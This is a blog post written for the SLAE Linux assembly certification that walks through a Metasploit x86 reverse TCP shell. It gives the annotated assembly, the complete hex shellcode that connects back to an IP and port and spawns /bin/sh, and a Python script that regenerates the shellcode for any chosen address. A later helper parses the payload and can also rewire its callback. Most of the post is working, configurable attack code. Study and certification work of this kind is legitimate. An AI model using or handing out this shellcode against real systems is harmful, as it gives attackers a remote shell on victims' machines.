
SLAE – Assignment #2: Reverse TCP Shell

Posted by: voidsec

Assignment #2: Reverse TCP Shell

Create a shell_reverse_tcp shellcode that connects back to an IP address on a specific port and executes a shell. The IP address and port number should be easily configurable.

Again, instead of writing a C TCP reverse shell from scratch, I decided to generate a raw Metasploit payload and analyze it with libemu.

Analyzing the Shellcode

All the code is also available on GitHub.

This time the analysis will be a lot shorter, because we can reuse most of the code we already analyzed in the previous assignment.

I’ve generated the graph with libemu in order to simplify our analysis:

Analyzing the image, we can understand that the shellcode needs to perform the following steps:

  1. Create a socket
  2. Duplicate the file descriptors
  3. Connect to the specified IP and port
  4. Execute /bin/sh via execve

ASM:

global _start
section .text
_start:
;----------- Create Socket ----------------------------
xor ebx,ebx            ; ebx = 0
mul ebx                ; eax = edx = 0
push ebx               ; 0 (protocol)
inc ebx                ; ebx = 1 (SYS_SOCKET)
push ebx               ; 1 (SOCK_STREAM)
push byte 0x2          ; 2 (AF_INET)
mov ecx,esp            ; ecx = pointer to args array [AF_INET, SOCK_STREAM, 0]
mov al,0x66            ; syscall 102 (socketcall)
int 0x80               ; eax = socket fd
;----------- Duplicate the file descriptors -----------
xchg eax,ebx           ; ebx = socket fd
pop ecx                ; ecx = 2 (the AF_INET value left on the stack), highest fd to duplicate
dup_loop:
mov al,0x3f            ; syscall 63 (dup2): dup2(sockfd, ecx)
int 0x80               ; syscall
dec ecx                ; next fd: 2 (stderr), 1 (stdout), 0 (stdin)
jns dup_loop           ; loop until ecx becomes -1
;----------- Connect -----------------------------------
push dword 0x100a8c0   ; sin_addr = 192.168.0.1 (bytes c0 a8 00 01 in memory)
push dword 0x5c110002  ; sin_port = 4444 (0x115c, network byte order), sin_family = 2 (AF_INET)
mov ecx,esp            ; ecx = pointer to the sockaddr_in structure
mov al,0x66            ; syscall 102 (socketcall)
push eax               ; addrlen (eax = 0x66, accepted by the kernel since it does not exceed sizeof(sockaddr_storage))
push ecx               ; pointer to sockaddr_in
push ebx               ; socket fd
mov bl,0x3             ; type of socketcall (3 = SYS_CONNECT)
mov ecx,esp            ; ecx = pointer to args array [sockfd, &sockaddr_in, addrlen]
int 0x80               ; syscall
;----------- Execve -----------------------------------
push edx               ; null terminator of the string (edx = 0)
push dword 0x68732f6e  ; "n/sh"
push dword 0x69622f2f  ; "//bi"
mov ebx,esp            ; ebx = pointer to "//bin/sh"
push edx               ; argv[1] = NULL
push ebx               ; argv[0] = pointer to "//bin/sh"
mov ecx,esp            ; ecx = argv = [filename, 0]; edx = envp = NULL
mov al,0xb             ; syscall 11 (execve)
int 0x80               ; syscall

Here is the hex-encoded Metasploit payload:

\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x00\x01\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80

Knowing that our shellcode was configured for port 4444 (0x115c in network byte order, which shows up as 5c11 in the little-endian dword) and the IP address 192.168.0.1, I built a simple Python script that lets me easily replace the port and IP address in our shellcode.

#!/usr/bin/env python
# Paolo Stagno aka [VoidSec](https://voidsec.com)
# SLAE-1511

import sys

if len(sys.argv) != 3:
    print("usage: " + sys.argv[0] + " ip port")
    sys.exit(-1)

ip = sys.argv[1]
octets = ip.split('.')
if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
    print("[!] Invalid IPv4 address {}".format(ip))
    sys.exit(-1)
# one \xNN per octet, in the order the "push dword" stores them (network byte order)
hip = "".join("\\x{:02x}".format(int(o)) for o in octets)

port = int(sys.argv[2])
if port < 0 or port > 65535:
    print("[!] Invalid TCP port number {}, must be between 0-65535".format(port))
    sys.exit(-1)
# always four hex digits (two bytes, network byte order), then add an \x every 2 chars
hport = "".join("\\x" + "{:04x}".format(port)[i:i + 2] for i in (0, 2))

shellcode = "\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x68{}\\x68\\x02\\x00{}\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80".format(hip, hport)

print("Reverse TCP shellcode connecting to {}:{} - {}:{}".format(ip, port, hip, hport))
# the AF_INET word (\x02\x00) already contains a null byte; an IP octet or port byte of 0 adds more
if "\\x00" in hip + hport:
    print("[!] Warning: the chosen IP/port adds null bytes to the shellcode")
print("\n" + shellcode)
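As an added example (not part of the original post or of Metasploit), here is the analyst's side of the same payload: a small Python helper that pulls the callback IP and port out of a raw shellcode by locating the two push dword instructions that build the sockaddr_in, lists the syscalls it invokes, flags the null bytes, and can also rewire the callback at byte level. The sample bytes are the payload quoted above; the pattern matching assumes the sockaddr_in is built exactly as in this payload and is not a general disassembler.

```python
import re
import socket
import struct

# Sample input: the raw Metasploit payload quoted above (192.168.0.1:4444).
SAMPLE = (b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59"
          b"\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x00\x01\x68\x02\x00\x11\x5c"
          b"\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f"
          b"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80")

# Assumption: sockaddr_in is built by "push dword <ip>" followed by
# "push dword <port:2><00 02>" (opcode 0x68 = push imm32), as in this payload.
SOCKADDR_PUSH = re.compile(rb"\x68(?P<ip>.{4})\x68\x02\x00(?P<port>.{2})", re.DOTALL)

# Linux x86 syscall numbers this payload loads with "mov al, imm8" (0xb0).
SYSCALLS = {0x66: "socketcall", 0x3f: "dup2", 0x0b: "execve"}

def extract_callback(shellcode):
    """Return every (ip, port) pair the payload would connect back to."""
    return [(socket.inet_ntoa(m.group("ip")), struct.unpack("!H", m.group("port"))[0])
            for m in SOCKADDR_PUSH.finditer(shellcode)]

def patch_callback(shellcode, ip, port):
    """Return a copy of the payload rewired to ip:port (byte-level version of the script above)."""
    m = SOCKADDR_PUSH.search(shellcode)
    if m is None:
        raise ValueError("no push-built sockaddr_in found in payload")
    rebuilt = b"\x68" + socket.inet_aton(ip) + b"\x68\x02\x00" + struct.pack("!H", port)
    return shellcode[:m.start()] + rebuilt + shellcode[m.end():]

def syscall_sequence(shellcode):
    """Heuristic: for each int 0x80 (cd 80), the nearest preceding "mov al, imm8" selects
    the syscall. dup2 appears once in the bytes but runs three times because of the jns loop."""
    names = []
    for m in re.finditer(rb"\xcd\x80", shellcode):
        idx = shellcode.rfind(b"\xb0", 0, m.start())
        num = shellcode[idx + 1] if idx != -1 else None
        names.append(SYSCALLS.get(num, "unknown({!r})".format(num)))
    return names

def null_byte_offsets(shellcode):
    """Offsets of 0x00 bytes; the AF_INET word (02 00) always contributes one."""
    return [i for i, b in enumerate(shellcode) if b == 0]

if __name__ == "__main__":
    print(extract_callback(SAMPLE), syscall_sequence(SAMPLE), null_byte_offsets(SAMPLE))
```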

SLAE Exam Statement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE-1511